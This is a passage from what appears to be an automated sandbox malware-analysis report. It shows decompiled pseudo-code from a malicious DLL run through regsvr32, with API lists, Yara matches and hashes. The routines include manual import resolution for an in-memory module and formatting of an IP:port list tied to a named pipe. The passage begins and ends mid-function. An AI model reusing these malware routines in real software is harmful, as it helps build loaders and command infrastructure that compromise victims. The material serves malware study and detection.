                                                                                                                                                                                              								}
                                                                                                                                                                                              								break;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t87 = _t81;
                                                                                                                                                                                              							__eflags = _t87;
                                                                                                                                                                                              							if(_t87 == 0) {
                                                                                                                                                                                              								_v204 = 0;
                                                                                                                                                                                              								_t88 = E0499171A( &_v204, _t221);
                                                                                                                                                                                              								_v188 = _t88;
                                                                                                                                                                                              								__eflags = _t88;
                                                                                                                                                                                              								if(_t88 == 0) {
                                                                                                                                                                                              									_push(4);
                                                                                                                                                                                              									_v192 = 0;
                                                                                                                                                                                              									_push( &_v192);
                                                                                                                                                                                              									L19:
                                                                                                                                                                                              									_push(0xa);
                                                                                                                                                                                              									goto L31;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t146 = _v204;
                                                                                                                                                                                              								_t90 = _t146 * 0x16;
                                                                                                                                                                                              								_v184 = _t146 * 0x16;
                                                                                                                                                                                              								_t203 = E04998BDE(_t90);
                                                                                                                                                                                              								_v192 = _t203;
                                                                                                                                                                                              								__eflags = _t203;
                                                                                                                                                                                              								if(_t203 == 0) {
                                                                                                                                                                                              									_t64 =  &_v192;
                                                                                                                                                                                              									 *_t64 = _v192 & 0x00000000;
                                                                                                                                                                                              									__eflags =  *_t64;
                                                                                                                                                                                              									_push(4);
                                                                                                                                                                                              									_push( &_v192);
                                                                                                                                                                                              									_t188 = 0xa;
                                                                                                                                                                                              									E0499D1A6(_t188);
                                                                                                                                                                                              									L52:
                                                                                                                                                                                              									E04998BF4( &_v188, _t146);
                                                                                                                                                                                              									goto L32;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t199 = 0;
                                                                                                                                                                                              								__eflags = _t146;
                                                                                                                                                                                              								if(_t146 == 0) {
                                                                                                                                                                                              									L50:
                                                                                                                                                                                              									_push(E0499A43D(_t203));
                                                                                                                                                                                              									_push(_t203);
                                                                                                                                                                                              									_t189 = 5;
                                                                                                                                                                                              									E0499D1A6(_t189);
                                                                                                                                                                                              									E04998BF4( &_v192, 0xffffffff);
                                                                                                                                                                                              									_t208 = _t208 + 0x10;
                                                                                                                                                                                              									goto L52;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t159 = _v188 + 4;
                                                                                                                                                                                              								__eflags = _t159;
                                                                                                                                                                                              								_v204 = _t159;
                                                                                                                                                                                              								do {
                                                                                                                                                                                              									__eflags = _t199;
                                                                                                                                                                                              									if(_t199 != 0) {
                                                                                                                                                                                              										__eflags = _t199 - _t146 - 1;
                                                                                                                                                                                              										if(_t199 < _t146 - 1) {
                                                                                                                                                                                              											_t102 = E0499A43D(_t203);
                                                                                                                                                                                              											_t159 = _v204;
                                                                                                                                                                                              											 *((short*)(_t102 + _t203)) = 0x3b;
                                                                                                                                                                                              										}
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_t100 =  *_t159;
                                                                                                                                                                                              									_v196 = _t100;
                                                                                                                                                                                              									__eflags = _t100;
                                                                                                                                                                                              									if(_t100 != 0) {
                                                                                                                                                                                              										_t103 = E0499A43D(_t203);
                                                                                                                                                                                              										_t104 = _v204;
                                                                                                                                                                                              										_push(_t104[1] & 0x0000ffff);
                                                                                                                                                                                              										_push( *_t104 >> 0x18);
                                                                                                                                                                                              										_push(_t104[0] & 0x000000ff);
                                                                                                                                                                                              										_push(_t104[0] & 0x000000ff);
                                                                                                                                                                                              										_t110 = E0499A43D(_t203) + _t203;
                                                                                                                                                                                              										__eflags = _t110;
                                                                                                                                                                                              										E04999E12(_t110, _v184 - _t103, "%u.%u.%u.%u:%u", _v196 & 0x000000ff);
                                                                                                                                                                                              										_t159 = _v204;
                                                                                                                                                                                              										_t208 = _t208 + 0x20;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_t199 = _t199 + 1;
                                                                                                                                                                                              									_t159 = _t159 + 0x20;
                                                                                                                                                                                              									_v204 = _t159;
                                                                                                                                                                                              									__eflags = _t199 - _t146;
                                                                                                                                                                                              								} while (_t199 < _t146);
                                                                                                                                                                                              								goto L50;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							__eflags = _t87 != 1;
                                                                                                                                                                                              							if(_t87 != 1) {
                                                                                                                                                                                              								goto L56;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_v204 = 0;
                                                                                                                                                                                              							_t113 = E0499171A( &_v204, _t221);
                                                                                                                                                                                              							_t204 = _v204;
                                                                                                                                                                                              							_v196 = _t113;
                                                                                                                                                                                              							__eflags = _t113;
                                                                                                                                                                                              							if(_t113 != 0) {
                                                                                                                                                                                              								E04998BF4( &_v196, _t204);
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_v204 = _t204 * 0x16;
                                                                                                                                                                                              							_t84 =  &_v204;
                                                                                                                                                                                              							goto L13;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						if(_t214 == 0) {
                                                                                                                                                                                              							_t84 = E049A0962( &_v200);
                                                                                                                                                                                              							L16:
                                                                                                                                                                                              							__eflags = _t84;
                                                                                                                                                                                              							if(_t84 == 0) {
                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                              								goto L19;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_push(_v200);
                                                                                                                                                                                              							goto L14;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t118 = _t80 - 1;
                                                                                                                                                                                              						if(_t118 == 0) {
                                                                                                                                                                                              							_t200 = E04999B33( &(_t149[4]), 0x20, 1,  &_v176);
                                                                                                                                                                                              							_v196 = _t200;
                                                                                                                                                                                              							__eflags = _t200;
                                                                                                                                                                                              							if(_t200 == 0) {
                                                                                                                                                                                              								L30:
                                                                                                                                                                                              								_t192 =  *0x49af8bc; // 0x0
                                                                                                                                                                                              								E04999EDB( &_v164,  &(_t192[4]), 0x80);
                                                                                                                                                                                              								_push(0x84);
                                                                                                                                                                                              								_push( &_v168);
                                                                                                                                                                                              								_push(2);
                                                                                                                                                                                              								goto L31;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t205 = _v176;
                                                                                                                                                                                              							__eflags = _t205 - 1;
                                                                                                                                                                                              							if(__eflags <= 0) {
                                                                                                                                                                                              								_t124 = E04991DD3(E04999F6F( *_t200, __eflags), 0, 0, 0);
                                                                                                                                                                                              								_t208 = _t208 + 0x10;
                                                                                                                                                                                              								_v168 = _t124;
                                                                                                                                                                                              								goto L30;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t125 = _t205 - 1;
                                                                                                                                                                                              							_v184 = _t205 - 1;
                                                                                                                                                                                              							_t127 = E04998BDE(_t125 << 2);
                                                                                                                                                                                              							_v188 = _t127;
                                                                                                                                                                                              							__eflags = _t127;
                                                                                                                                                                                              							if(_t127 == 0) {
                                                                                                                                                                                              								goto L30;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t148 = 1;
                                                                                                                                                                                              							__eflags = _t205 - 1;
                                                                                                                                                                                              							if(__eflags <= 0) {
                                                                                                                                                                                              								L28:
                                                                                                                                                                                              								_t129 = E04991DD3(E04999F6F( *_t200, __eflags), _t127, _v184, 0);
                                                                                                                                                                                              								_t208 = _t208 + 0x10;
                                                                                                                                                                                              								_v168 = _t129;
                                                                                                                                                                                              								E04999C2C( &_v176);
                                                                                                                                                                                              								goto L30;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_v204 = _t127;
                                                                                                                                                                                              							do {
                                                                                                                                                                                              								_t132 = E04999880( *((intOrPtr*)(_t200 + _t148 * 4)), E0499A43D( *((intOrPtr*)(_t200 + _t148 * 4))));
                                                                                                                                                                                              								_t183 = _v204;
                                                                                                                                                                                              								_t148 = _t148 + 1;
                                                                                                                                                                                              								 *_t183 = _t132;
                                                                                                                                                                                              								_v204 = _t183 + 4;
                                                                                                                                                                                              								__eflags = _t148 - _t205;
                                                                                                                                                                                              							} while (__eflags < 0);
                                                                                                                                                                                              							_t127 = _v188;
                                                                                                                                                                                              							goto L28;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t133 = _t118 - 3;
                                                                                                                                                                                              						if(_t133 == 0) {
                                                                                                                                                                                              							_push(0);
                                                                                                                                                                                              							_push(0);
                                                                                                                                                                                              							_t196 = 5;
                                                                                                                                                                                              							E04995EC3(E0499D1A6(_t196));
                                                                                                                                                                                              							_v172 = 1;
                                                                                                                                                                                              							goto L56;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t137 = _t133;
                                                                                                                                                                                              						if(_t137 == 0) {
                                                                                                                                                                                              							_t84 = E049A0940( &_v200);
                                                                                                                                                                                              							goto L16;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						if(_t137 != 1) {
                                                                                                                                                                                              							goto L56;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						E049A0940( &_v200);
                                                                                                                                                                                              						goto L12;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return 0;
                                                                                                                                                                                              			}
























































                                                                                                                                                                                              0x04993857
                                                                                                                                                                                              0x04993858
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04993858
                                                                                                                                                                                              0x04993851
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04993851
                                                                                                                                                                                              0x04993810
                                                                                                                                                                                              0x04993813
                                                                                                                                                                                              0x0499388f
                                                                                                                                                                                              0x04993891
                                                                                                                                                                                              0x04993897
                                                                                                                                                                                              0x04993899
                                                                                                                                                                                              0x04993936
                                                                                                                                                                                              0x04993936
                                                                                                                                                                                              0x04993948
                                                                                                                                                                                              0x0499394e
                                                                                                                                                                                              0x04993957
                                                                                                                                                                                              0x04993958
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04993958
                                                                                                                                                                                              0x0499389f
                                                                                                                                                                                              0x049938a3
                                                                                                                                                                                              0x049938a6
                                                                                                                                                                                              0x0499392a
                                                                                                                                                                                              0x0499392f
                                                                                                                                                                                              0x04993932
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04993932
                                                                                                                                                                                              0x049938a8
                                                                                                                                                                                              0x049938ab
                                                                                                                                                                                              0x049938b3
                                                                                                                                                                                              0x049938b8
                                                                                                                                                                                              0x049938bd
                                                                                                                                                                                              0x049938bf
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049938c3
                                                                                                                                                                                              0x049938c4
                                                                                                                                                                                              0x049938c6
                                                                                                                                                                                              0x049938f5
                                                                                                                                                                                              0x04993904
                                                                                                                                                                                              0x04993909
                                                                                                                                                                                              0x0499390c
                                                                                                                                                                                              0x04993918
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04993918
                                                                                                                                                                                              0x049938c8
                                                                                                                                                                                              0x049938cc
                                                                                                                                                                                              0x049938da
                                                                                                                                                                                              0x049938df
                                                                                                                                                                                              0x049938e3
                                                                                                                                                                                              0x049938e4
                                                                                                                                                                                              0x049938e9
                                                                                                                                                                                              0x049938ed
                                                                                                                                                                                              0x049938ed
                                                                                                                                                                                              0x049938f1
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049938f1
                                                                                                                                                                                              0x04993815
                                                                                                                                                                                              0x04993818
                                                                                                                                                                                              0x04993860
                                                                                                                                                                                              0x04993861
                                                                                                                                                                                              0x04993864
                                                                                                                                                                                              0x0499386c
                                                                                                                                                                                              0x04993871
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04993871
                                                                                                                                                                                              0x0499381b
                                                                                                                                                                                              0x0499381e
                                                                                                                                                                                              0x04993847
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04993847
                                                                                                                                                                                              0x04993823
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499382e
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499382e
                                                                                                                                                                                              0x049937e7
                                                                                                                                                                                              0x04993b1f

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 049937B2
                                                                                                                                                                                                • Part of subcall function 0499D1A6: FlushFileBuffers.KERNEL32(00000000,?,04993AC6,00000000,00000004), ref: 0499D1EC
                                                                                                                                                                                              • DisconnectNamedPipe.KERNEL32 ref: 04993B03
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: BuffersDisconnectErrorFileFlushLastNamedPipe
                                                                                                                                                                                              • String ID: %u.%u.%u.%u:%u
                                                                                                                                                                                              • API String ID: 465096328-3858738763
                                                                                                                                                                                              • Opcode ID: e13b225448e724352b1f3fe7fdf9ff30bfc48ffbd069ed872f6b79a65a61a0bb
                                                                                                                                                                                              • Instruction ID: 1bf4a4f61ba38c815da38ca893ed7a1ecf4601f5b4c1cdf5a95c650284232cdc
                                                                                                                                                                                              • Opcode Fuzzy Hash: e13b225448e724352b1f3fe7fdf9ff30bfc48ffbd069ed872f6b79a65a61a0bb
                                                                                                                                                                                              • Instruction Fuzzy Hash: 01A195B2508301AFEB24DF6DD885A6BB7ECEF88314F04493EF95596140DB34ED458B52
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 50%
                                                                                                                                                                                              			E049A370B(signed int __eax, void* __ecx, intOrPtr _a4) {
                                                                                                                                                                                              				intOrPtr* _v8;
                                                                                                                                                                                              				signed int* _v12;
                                                                                                                                                                                              				signed int _v16;
                                                                                                                                                                                              				signed int _v20;
                                                                                                                                                                                              				signed int _v24;
                                                                                                                                                                                              				signed int _v28;
                                                                                                                                                                                              				intOrPtr _v32;
                                                                                                                                                                                              				struct HINSTANCE__* _v36;
                                                                                                                                                                                              				intOrPtr _v40;
                                                                                                                                                                                              				signed int _v44;
                                                                                                                                                                                              				struct HINSTANCE__* _v48;
                                                                                                                                                                                              				intOrPtr _v52;
                                                                                                                                                                                              				signed int _v56;
                                                                                                                                                                                              				intOrPtr _v60;
                                                                                                                                                                                              				signed int _v64;
                                                                                                                                                                                              				signed int _t109;
                                                                                                                                                                                              				signed int _t112;
                                                                                                                                                                                              				signed int _t115;
                                                                                                                                                                                              				void* _t163;
                                                                                                                                                                                              				void* _t167;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t167 = __ecx;
                                                                                                                                                                                              				_v44 = _v44 & 0x00000000;
                                                                                                                                                                                              				if(_a4 != 0) {
                                                                                                                                                                                              					_v48 = GetModuleHandleA("kernel32.dll");
                                                                                                                                                                                              					_v40 = E0499EFA7(_t167, _v48, "GetProcAddress");
                                                                                                                                                                                              					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                                                                                                                                                                                              					_v32 = _v52;
                                                                                                                                                                                              					_t109 = 8;
                                                                                                                                                                                              					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
                                                                                                                                                                                              						L24:
                                                                                                                                                                                              						return 0;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_v56 = 0x80000000;
                                                                                                                                                                                              					_t112 = 8;
                                                                                                                                                                                              					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
                                                                                                                                                                                              					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                                                                                                                                                                              						_v8 = _v8 + 0x14;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t115 = 8;
                                                                                                                                                                                              					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
                                                                                                                                                                                              					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                                                                                                                                                                              						_t34 = _v8 + 0xc; // 0xffff
                                                                                                                                                                                              						_v36 = LoadLibraryA( *_t34 + _a4);
                                                                                                                                                                                              						if(_v36 != 0) {
                                                                                                                                                                                              							if( *_v8 == 0) {
                                                                                                                                                                                              								_t43 = _v8 + 0x10; // 0xb8
                                                                                                                                                                                              								_v12 =  *_t43 + _a4;
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								_v12 =  *_v8 + _a4;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_v28 = _v28 & 0x00000000;
                                                                                                                                                                                              							while( *_v12 != 0) {
                                                                                                                                                                                              								_v24 = _v24 & 0x00000000;
                                                                                                                                                                                              								_v16 = _v16 & 0x00000000;
                                                                                                                                                                                              								_v64 = _v64 & 0x00000000;
                                                                                                                                                                                              								_v20 = _v20 & 0x00000000;
                                                                                                                                                                                              								if(( *_v12 & _v56) == 0) {
                                                                                                                                                                                              									_v60 =  *_v12 + _a4;
                                                                                                                                                                                              									_v20 = _v60 + 2;
                                                                                                                                                                                              									_t73 = _v8 + 0x10; // 0xb8
                                                                                                                                                                                              									_v24 =  *((intOrPtr*)( *_t73 + _a4 + _v28));
                                                                                                                                                                                              									_v16 = _v40(_v36, _v20);
                                                                                                                                                                                              								} else {
                                                                                                                                                                                              									_v24 =  *_v12;
                                                                                                                                                                                              									_v20 = _v24 & 0x0000ffff;
                                                                                                                                                                                              									_v16 = _v40(_v36, _v20);
                                                                                                                                                                                              								}
                                                                                                                                                                                              								if(_v24 != _v16) {
                                                                                                                                                                                              									_v44 = _v44 + 1;
                                                                                                                                                                                              									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
                                                                                                                                                                                              										 *_v12 = _v16;
                                                                                                                                                                                              									} else {
                                                                                                                                                                                              										_t89 = _v8 + 0x10; // 0xb8
                                                                                                                                                                                              										 *( *_t89 + _a4 + _v28) = _v16;
                                                                                                                                                                                              									}
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_v12 =  &(_v12[1]);
                                                                                                                                                                                              								_v28 = _v28 + 4;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_v8 = _v8 + 0x14;
                                                                                                                                                                                              							continue;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t163 = 0xfffffffd;
                                                                                                                                                                                              						return _t163;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					goto L24;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return __eax | 0xffffffff;
                                                                                                                                                                                              			}
























                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 049A3728
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00000000), ref: 049A37C1
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: HandleLibraryLoadModule
                                                                                                                                                                                              • String ID: GetProcAddress$kernel32.dll
                                                                                                                                                                                              • API String ID: 4133054770-1584408056
                                                                                                                                                                                              • Opcode ID: c0fe9c514c745152e66df44165b4e0ca4020ebcb0d22424b2a90db89f9474248
                                                                                                                                                                                              • Instruction ID: 6f70bdbc7e0dfc8f4197e80d0779d18db33426c5f276b58c1ef99cb7429941be
                                                                                                                                                                                              • Opcode Fuzzy Hash: c0fe9c514c745152e66df44165b4e0ca4020ebcb0d22424b2a90db89f9474248
                                                                                                                                                                                              • Instruction Fuzzy Hash: 29619075E10209EFDB10CF98C485BADBBF1FF48315F2485A9E815AB291D734AA90DF90
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 99%
                                                                                                                                                                                              			E049A4100(int _a4, signed int _a8) {
                                                                                                                                                                                              				int _v8;
                                                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                                                              				signed int _v16;
                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                              				void* _t137;
                                                                                                                                                                                              				signed int _t141;
                                                                                                                                                                                              				intOrPtr* _t142;
                                                                                                                                                                                              				signed int _t145;
                                                                                                                                                                                              				signed int _t146;
                                                                                                                                                                                              				intOrPtr _t151;
                                                                                                                                                                                              				intOrPtr _t161;
                                                                                                                                                                                              				intOrPtr _t162;
                                                                                                                                                                                              				intOrPtr _t167;
                                                                                                                                                                                              				intOrPtr _t170;
                                                                                                                                                                                              				signed int _t172;
                                                                                                                                                                                              				intOrPtr _t173;
                                                                                                                                                                                              				int _t184;
                                                                                                                                                                                              				intOrPtr _t185;
                                                                                                                                                                                              				intOrPtr _t188;
                                                                                                                                                                                              				signed int _t189;
                                                                                                                                                                                              				void* _t195;
                                                                                                                                                                                              				int _t202;
                                                                                                                                                                                              				int _t208;
                                                                                                                                                                                              				intOrPtr _t217;
                                                                                                                                                                                              				signed int _t218;
                                                                                                                                                                                              				int _t219;
                                                                                                                                                                                              				intOrPtr _t220;
                                                                                                                                                                                              				signed int _t221;
                                                                                                                                                                                              				signed int _t222;
                                                                                                                                                                                              				int _t224;
                                                                                                                                                                                              				int _t225;
                                                                                                                                                                                              				signed int _t227;
                                                                                                                                                                                              				intOrPtr _t228;
                                                                                                                                                                                              				int _t232;
                                                                                                                                                                                              				int _t234;
                                                                                                                                                                                              				signed int _t235;
                                                                                                                                                                                              				int _t239;
                                                                                                                                                                                              				void* _t240;
                                                                                                                                                                                              				int _t245;
                                                                                                                                                                                              				int _t252;
                                                                                                                                                                                              				signed int _t253;
                                                                                                                                                                                              				int _t254;
                                                                                                                                                                                              				void* _t257;
                                                                                                                                                                                              				void* _t258;
                                                                                                                                                                                              				int _t259;
                                                                                                                                                                                              				intOrPtr _t260;
                                                                                                                                                                                              				int _t261;
                                                                                                                                                                                              				signed int _t269;
                                                                                                                                                                                              				signed int _t271;
                                                                                                                                                                                              				intOrPtr* _t272;
                                                                                                                                                                                              				void* _t273;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t253 = _a8;
                                                                                                                                                                                              				_t272 = _a4;
                                                                                                                                                                                              				_t3 = _t272 + 0xc; // 0x452bf84d
                                                                                                                                                                                              				_t4 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                              				_t228 =  *_t4;
                                                                                                                                                                                              				_t137 =  *_t3 + 0xfffffffb;
                                                                                                                                                                                              				_t229 =  <=  ? _t137 : _t228;
                                                                                                                                                                                              				_v16 =  <=  ? _t137 : _t228;
                                                                                                                                                                                              				_t269 = 0;
                                                                                                                                                                                              				_a4 =  *((intOrPtr*)( *_t272 + 4));
                                                                                                                                                                                              				asm("o16 nop [eax+eax]");
                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                              					_t8 = _t272 + 0x16bc; // 0xfed1e900
                                                                                                                                                                                              					_t141 =  *_t8 + 0x2a >> 3;
                                                                                                                                                                                              					_v12 = 0xffff;
                                                                                                                                                                                              					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
                                                                                                                                                                                              					if(_t217 < _t141) {
                                                                                                                                                                                              						break;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t11 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                                              					_t12 = _t272 + 0x5c; // 0xbde85000
                                                                                                                                                                                              					_t245 =  *_t11 -  *_t12;
                                                                                                                                                                                              					_v8 = _t245;
                                                                                                                                                                                              					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
                                                                                                                                                                                              					_t247 =  <  ? _t195 : _v12;
                                                                                                                                                                                              					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
                                                                                                                                                                                              					if(_t227 >= _v16) {
                                                                                                                                                                                              						L7:
                                                                                                                                                                                              						if(_t253 != 4) {
                                                                                                                                                                                              							L10:
                                                                                                                                                                                              							_t269 = 0;
                                                                                                                                                                                              							__eflags = 0;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							_t285 = _t227 - _t195;
                                                                                                                                                                                              							if(_t227 != _t195) {
                                                                                                                                                                                              								goto L10;
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								_t269 = _t253 - 3;
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              						E049A7120(_t272, _t272, 0, 0, _t269);
                                                                                                                                                                                              						_t18 = _t272 + 0x14; // 0xc703f045
                                                                                                                                                                                              						_t19 = _t272 + 8; // 0x8d000040
                                                                                                                                                                                              						 *( *_t18 +  *_t19 - 4) = _t227;
                                                                                                                                                                                              						_t22 = _t272 + 0x14; // 0xc703f045
                                                                                                                                                                                              						_t23 = _t272 + 8; // 0x8d000040
                                                                                                                                                                                              						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
                                                                                                                                                                                              						_t26 = _t272 + 0x14; // 0xc703f045
                                                                                                                                                                                              						_t27 = _t272 + 8; // 0x8d000040
                                                                                                                                                                                              						 *( *_t26 +  *_t27 - 2) =  !_t227;
                                                                                                                                                                                              						_t30 = _t272 + 0x14; // 0xc703f045
                                                                                                                                                                                              						_t31 = _t272 + 8; // 0x8d000040
                                                                                                                                                                                              						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
                                                                                                                                                                                              						E049A5E80(_t285,  *_t272);
                                                                                                                                                                                              						_t202 = _v8;
                                                                                                                                                                                              						_t273 = _t273 + 0x14;
                                                                                                                                                                                              						if(_t202 != 0) {
                                                                                                                                                                                              							_t208 =  >  ? _t227 : _t202;
                                                                                                                                                                                              							_v8 = _t208;
                                                                                                                                                                                              							_t36 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                                              							_t37 = _t272 + 0x5c; // 0xbde85000
                                                                                                                                                                                              							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
                                                                                                                                                                                              							_t273 = _t273 + 0xc;
                                                                                                                                                                                              							_t252 = _v8;
                                                                                                                                                                                              							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
                                                                                                                                                                                              							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
                                                                                                                                                                                              							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
                                                                                                                                                                                              							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
                                                                                                                                                                                              							_t227 = _t227 - _t252;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						if(_t227 != 0) {
                                                                                                                                                                                              							E049A5FC0( *_t272,  *( *_t272 + 0xc), _t227);
                                                                                                                                                                                              							_t273 = _t273 + 0xc;
                                                                                                                                                                                              							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
                                                                                                                                                                                              							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
                                                                                                                                                                                              							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t253 = _a8;
                                                                                                                                                                                              						if(_t269 == 0) {
                                                                                                                                                                                              							continue;
                                                                                                                                                                                              						}
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						if(_t227 != 0 || _t253 == 4) {
                                                                                                                                                                                              							if(_t253 != 0 && _t227 == _t195) {
                                                                                                                                                                                              								goto L7;
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              					break;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t142 =  *_t272;
                                                                                                                                                                                              				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
                                                                                                                                                                                              				_a4 = _t232;
                                                                                                                                                                                              				if(_t232 == 0) {
                                                                                                                                                                                              					_t83 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                                              					_t254 =  *_t83;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_t59 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                              					_t224 =  *_t59;
                                                                                                                                                                                              					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0xa1ec8b55
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0x8341ffff
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0xa1ec8b55
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0xa1ec8b55
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
